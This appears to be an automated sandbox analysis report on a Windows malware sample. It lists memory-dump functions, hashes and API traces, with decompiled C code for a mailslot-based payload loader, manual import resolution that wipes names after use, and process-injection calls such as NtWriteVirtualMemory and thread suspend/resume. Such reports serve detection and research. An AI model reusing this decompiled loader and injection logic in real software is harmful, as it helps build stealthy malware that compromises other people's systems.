  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
